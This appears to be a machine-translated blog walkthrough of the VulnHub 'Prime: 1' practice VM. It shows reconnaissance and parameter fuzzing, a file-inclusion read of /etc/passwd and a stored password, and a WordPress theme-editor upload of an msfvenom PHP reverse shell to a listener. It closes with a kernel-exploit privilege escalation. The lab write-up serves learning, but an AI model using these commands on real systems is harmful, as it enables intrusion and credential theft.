当前位置：网站首页>[vulnhub range] prime:1 record of shooting process

[vulnhub range] prime:1 record of shooting process

2022-07-19 11:45:00 【didiplus】

Recently, I found a very interesting shooting range collection , It covers some basic vulnerabilities , We reproduce through loopholes . Understand some basic operations of network security .

PRIME:1 Target download link

Prime: 1

Environmental preparation

install Kali System

Please refer to this article for installation methods https://blog.csdn.net/m0_55754984/article/details/119177156

Lead the target into VMware

1、 Download the Prime Drone aircraft , Unzip and import to VMware in , Network adapter selection NAT,Kali The same configuration is also done for the system .
![image.png](https://img-blog.csdnimg.cn/img_convert/c891b8bca07e51601f812275d425bb08.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=391&id=uf379f1b5&margin=[object Object]&name=image.png&originHeight=391&originWidth=709&originalType=binary&ratio=1&rotation=0&showTitle=false&size=23788&status=done&style=none&taskId=u26f80c1a-328c-48f1-87a3-a9222acef80&title=&width=709)

How did you get the target plane IP

1、 First of all to see kali Of IP Address , as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/b53cb8ce5d2093c50b6ac355cc0157e2.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=345&id=u74c8988d&margin=[object Object]&name=image.png&originHeight=345&originWidth=650&originalType=binary&ratio=1&rotation=0&showTitle=false&size=36404&status=done&style=none&taskId=u27ce312d-d9f1-493a-9d57-2242e8a738f&title=&width=650)
2、 Due to the target and Kali On the same network , So by scanning 192.168.37.0/24 This C Segment of the network . You can find the target IP.
![image.png](https://img-blog.csdnimg.cn/img_convert/4672a21151de12ef032678059b781df7.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=289&id=udc7bc02c&margin=[object Object]&name=image.png&originHeight=289&originWidth=709&originalType=binary&ratio=1&rotation=0&showTitle=false&size=35140&status=done&style=none&taskId=u4321a50e-6d3d-4e34-9183-4215deab323&title=&width=709)
Got the target IP 了 , Then we need to find those services on the target .

How to find service

Services and ports are one-to-one , therefore , We can discover services through port scanning . Execute the following command to scan ports

nmap -sS -sV -p- -T5 192.168.37.129

Execution completed , Return as shown in the figure below ：
![image.png](https://img-blog.csdnimg.cn/img_convert/96e5a4f435d2fff4002d6aa4d7fdd345.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=256&id=u93902b9b&margin=[object Object]&name=image.png&originHeight=256&originWidth=757&originalType=binary&ratio=1&rotation=0&showTitle=false&size=33191&status=done&style=none&taskId=u5b087fe4-1d61-48be-9ecf-c104b5a1702&title=&width=757)
By observing the above results , Found the target turned on ssh Service and web service . next , We visit... In the browser web Service depends on what information you can get .
![image.png](https://img-blog.csdnimg.cn/img_convert/677b08a80486965c76be2ce5766c1dd4.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=758&id=ue9cbf8b9&margin=[object Object]&name=image.png&originHeight=758&originWidth=1346&originalType=binary&ratio=1&rotation=0&showTitle=false&size=557705&status=done&style=none&taskId=u5da70c69-cb0b-4095-8805-47a1bd8d42b&title=&width=1346)
By looking at web The source code has not been found , Useful information . next step , We dig deeply into the directory of the website .

Directory scanning

The common tool for directory scanning is dirb, This tool is kali Self contained , Execute the following command to scan the directory

dirb http://192.168.37.129/

The scanning results are as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/299ab5d4054172d945a9d7eda87d2dfa.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=387&id=u22902dbc&margin=[object Object]&name=image.png&originHeight=387&originWidth=856&originalType=binary&ratio=1&rotation=0&showTitle=false&size=47181&status=done&style=none&taskId=ubcbd950e-ac53-4d79-87d4-63ee8c8a2d6&title=&width=856)
By observing the above results , Found several suspicious directories , I visit one by one , See if you can get useful information .
visit http://192.168.37.129/dev, Get the following flirtation ：

hello,

now you are at level 0 stage.

In real life pentesting we should use our tools to dig on a web very hard.

Happy hacking.

The general meaning is ： Now you are 0 Stage , in real life , We should use our tools to dig very hard on the Internet . Happy hacker .

visit wordpress, A simple blog page appears , There's nothing particularly useful . We are further scanning , Scan by specifying some suffixes . Execute the following command

dirb http://192.168.37.129/ -X .txt,.php,.zip

The results are as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/bdd73c161798685bb10a677670f1fb91.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=391&id=u45ad74af&margin=[object Object]&name=image.png&originHeight=391&originWidth=878&originalType=binary&ratio=1&rotation=0&showTitle=false&size=30019&status=done&style=none&taskId=uc1981394-1f1f-4c68-b6ad-511ca12c0c3&title=&width=878)
By observing the above results , Found three suspicious directories , among secret.txt, Too suspicious , Visit it , You get the following ：
![image.png](https://img-blog.csdnimg.cn/img_convert/f55b5c8108f4f89fb1b513c7e977433a.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=272&id=ufc8ed050&margin=[object Object]&name=image.png&originHeight=272&originWidth=862&originalType=binary&ratio=1&rotation=0&showTitle=false&size=18600&status=done&style=none&taskId=uc978aa3c-8ac4-4eed-9eec-846dc750019&title=&width=862)

Get prompt information ：
about php File more fuzz, Find the correct parameters parameter
have access to fuzz Tools , such as git Of ：Fuzz_For_Web
If you are still stuck in this step , To learn OSCP(Offensive Security Certified Professional) With Kali Linux The exam with practical operation as the main content
If you find location.txt The location of , I know what to do next （ First remember it , We'll use that later ）

Fuuz Get parameters

test index.php Parameters of , Execute the following command

 wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt   http://192.168.37.129/index.php?FUZZ

give the result as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/95684a07634236fe3fa094839f5dcf04.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=399&id=u9a58c64a&margin=[object Object]&name=image.png&originHeight=399&originWidth=1128&originalType=binary&ratio=1&rotation=0&showTitle=false&size=32755&status=done&style=none&taskId=ua5a4a58f-4731-4be7-b1dc-019facdcd7f&title=&width=1128)
Filter 12 individual Word Result , Execute the following command ：

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 12  http://192.168.37.129/index.php?FUZZ

The results are as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/9c1717b67a1dda92f9ecdeb3489d49b2.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=320&id=uf04cd3da&margin=[object Object]&name=image.png&originHeight=320&originWidth=965&originalType=binary&ratio=1&rotation=0&showTitle=false&size=25133&status=done&style=none&taskId=u8d4f1c7f-5850-4414-aad4-12fe572a7a0&title=&width=965)
According to the above prompt, there is a file location.txt visit curl http://192.168.37.129/index.php?file=location.txt
Get the result as shown in the figure below ：
![image.png](https://img-blog.csdnimg.cn/img_convert/fc77309ad98259b97a0008e0775cb99a.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=187&id=u2d02b0c3&margin=[object Object]&name=image.png&originHeight=187&originWidth=1647&originalType=binary&ratio=1&rotation=0&showTitle=false&size=18138&status=done&style=none&taskId=u9218048c-fdc9-452a-bfaf-4c5cd80d7ec&title=&width=1647)

Prompt use secrettier360 Parameters in other PHP Mining information on the page .

By visiting curl http://192.168.37.129/image.php?secrettier360=/etc/passwd, Get the following information ：
![image.png](https://img-blog.csdnimg.cn/img_convert/b693f1b16dd3cfdcc1b1827ead406da7.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=775&id=u0e681ece&margin=[object Object]&name=image.png&originHeight=775&originWidth=827&originalType=binary&ratio=1&rotation=0&showTitle=false&size=96443&status=done&style=none&taskId=ucaf6a9b0-63b8-482d-87f4-2ff4bfacdc3&title=&width=827)
By observing the above prompts, it is found that the password is placed in /home/saket/password.txt, Combined with the vulnerability of reading files just found , We construct a link curl http://192.168.37.129/image.php?secrettier360=/home/saket/password.txt. Get the following information
![image.png](https://img-blog.csdnimg.cn/img_convert/758dff8a8acf8402a9afb38d4d29aa8b.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=149&id=ua0f04a20&margin=[object Object]&name=image.png&originHeight=149&originWidth=748&originalType=binary&ratio=1&rotation=0&showTitle=false&size=14161&status=done&style=none&taskId=ubd39509c-43bb-4997-8e26-1f5cf0ad682&title=&width=748)
Found the password is ：follow_the_ippsec.

wordpress Exploit

Now I have the password , But there is no user name , Can pass wpsan Scan user name , Execute the following command ：

wpscan --url http://192.168.37.129/wordpress/ --enumerate u

The results are as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/0e4944a5b6d5cc579dab121087d755b4.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=838&id=ubc42b3af&margin=[object Object]&name=image.png&originHeight=838&originWidth=1164&originalType=binary&ratio=1&rotation=0&showTitle=false&size=93584&status=done&style=none&taskId=u658c1c45-a9d7-4be5-a04a-853722eaf0b&title=&width=1164)
User name found victor. Try to use victor and follow_the_ippsec Log in to wordpress The background of . I found that I can successfully log in . After logging in , Use the theme editor (Appearance-Theme Editor) Vulnerability to rebound code upload .
![image.png](https://img-blog.csdnimg.cn/img_convert/09bffa30a745549f754e1b2baa70c64a.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=689&id=u826feb6a&margin=[object Object]&name=image.png&originHeight=689&originWidth=1894&originalType=binary&ratio=1&rotation=0&showTitle=false&size=62149&status=done&style=none&taskId=u35a624a7-af50-4417-a16a-f7ad48228ee&title=&width=1894)

Generate php rebound shell

adopt msfvenom Generate a... Directly php rebound shell Update the code to the target file secret.php And then configure it metasploit visit secret.php You can take shell
Generate bounce shell The order is as follows ：

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.37.128 lport=7777 -o shell.php

The generated code is updated directly to secret.php in .
![image.png](https://img-blog.csdnimg.cn/img_convert/543b6fa0b04e67a7e6468f1ef2617bdb.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=862&id=u90f73da2&margin=[object Object]&name=image.png&originHeight=862&originWidth=1759&originalType=binary&ratio=1&rotation=0&showTitle=false&size=196778&status=done&style=none&taskId=u31e77800-8635-4ced-a4c4-21e09a60c94&title=&width=1759)

Delete /*, Write the generated shell

To configure metasploit

stay kali Start on host msfconsole, And implement use exploit/multi/handler Here's the picture ：
![image.png](https://img-blog.csdnimg.cn/img_convert/753ecfe9288e20f343f1fe798161f7a1.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=111&id=ua9fc93b8&margin=[object Object]&name=image.png&originHeight=111&originWidth=877&originalType=binary&ratio=1&rotation=0&showTitle=false&size=9193&status=done&style=none&taskId=u4a2fc4e3-0f49-464a-a9f2-18692988f08&title=&width=877)
To configure payload Parameters , Execute the following command ：

set payload php/meterpreter/reverse_tcp

Change the parameter to generate rebound shell Keep consistent (php/meterpreter/reverse_tcp)

Configure the listening host IP And port number , The code executed is as follows ：

set lhost 192.168.37.128
set lport 7777

These two parameters are also related to rebound shell One by one .

![image.png](https://img-blog.csdnimg.cn/img_convert/7d273dcd6b0e4f7b663935b6549c15b2.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=116&id=u7bcf46ff&margin=[object Object]&name=image.png&originHeight=116&originWidth=1229&originalType=binary&ratio=1&rotation=0&showTitle=false&size=15000&status=done&style=none&taskId=u4f16f5c9-8990-4f5f-84f9-1d67f0d38b1&title=&width=1229)
perform exploit Start listening , visit http://192.168.37.19/wordpress/wp-content/themes/twentynineteen/secret.php Successful rebound shell.
![image.png](https://img-blog.csdnimg.cn/img_convert/432b70e9650bc6945b840c01cabf9e2f.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=116&id=u9521dc2c&margin=[object Object]&name=image.png&originHeight=116&originWidth=1001&originalType=binary&ratio=1&rotation=0&showTitle=false&size=13216&status=done&style=none&taskId=ub9d85ba8-50ea-4d93-ade0-e97fbc0e0ea&title=&width=1001)
Successful entry shell after , adopt getuid Found that the user is www-data, Basically, there is no authority . The next step is to extract .

extract

Check the version of the system before extracting , What loopholes can be exploited . Through execution sysinfo Command to view system version information , Here's the picture ：
![image.png](https://img-blog.csdnimg.cn/img_convert/0f0153211204e70d2b52bea4cb117e7b.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=82&id=u8cdea9bc&margin=[object Object]&name=image.png&originHeight=82&originWidth=1062&originalType=binary&ratio=1&rotation=0&showTitle=false&size=7259&status=done&style=none&taskId=ud02d075d-42a1-4220-8f7a-ee363a89d2d&title=&width=1062)
By observing the above results, it is found that , System is Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu. perform msfconsole perform searchsploit 16.04 Ubuntu, give the result as follows ：
![image.png](https://img-blog.csdnimg.cn/img_convert/476b184739bd2a4d88ba98d095e8e3cc.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=457&id=u53716fa5&margin=[object Object]&name=image.png&originHeight=457&originWidth=1443&originalType=binary&ratio=1&rotation=0&showTitle=false&size=99309&status=done&style=none&taskId=u1ebd9209-bff9-4566-92b3-47abc8c0590&title=&width=1443)
Because the kernel version of the target is 4.10.0-28, So using 45010.c This file is used for authorization raising . The first 45010.c from
/usr/share/exploitdb/exploits/linux/local/ Copy root Compile under directory . Here's the picture ：
![image.png](https://img-blog.csdnimg.cn/img_convert/f5cff3e398a10c37ba0397eee3f4d526.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=204&id=u9f461fa2&margin=[object Object]&name=image.png&originHeight=204&originWidth=850&originalType=binary&ratio=1&rotation=0&showTitle=false&size=12576&status=done&style=none&taskId=u8e65c6dd-f59e-4830-a125-491b38ebc8e&title=&width=850)
Upload the right raising document to the target plane /tmp Under the table of contents , Here's the picture ：
![image.png](https://img-blog.csdnimg.cn/img_convert/1e59546ee6a91cdfc02c4a0863d9d4d6.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=330&id=u2f8bd155&margin=[object Object]&name=image.png&originHeight=330&originWidth=1171&originalType=binary&ratio=1&rotation=0&showTitle=false&size=46450&status=done&style=none&taskId=uf09b6092-d348-4a6a-a919-3faeb0145c9&title=&width=1171)
to 45010 The file gives permission to execute , And implement . Here's the picture ：
![image.png](https://img-blog.csdnimg.cn/img_convert/e8af1af999e30255b74f650346a460bb.png#clientId=u2a618f06-6f3c-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=452&id=uabd341b4&margin=[object Object]&name=image.png&originHeight=452&originWidth=1174&originalType=binary&ratio=1&rotation=0&showTitle=false&size=35472&status=done&style=none&taskId=ubf4930b6-22a2-4681-a9f0-e9e93bc32c3&title=&width=1174)

Be careful ： Be sure to enter the interaction shell Only give 45010 Modify permissions and perform operations . perform shell after , Can pass python -c "import pty;pty.spawn('/bin/bash');" Get the whole interaction shell.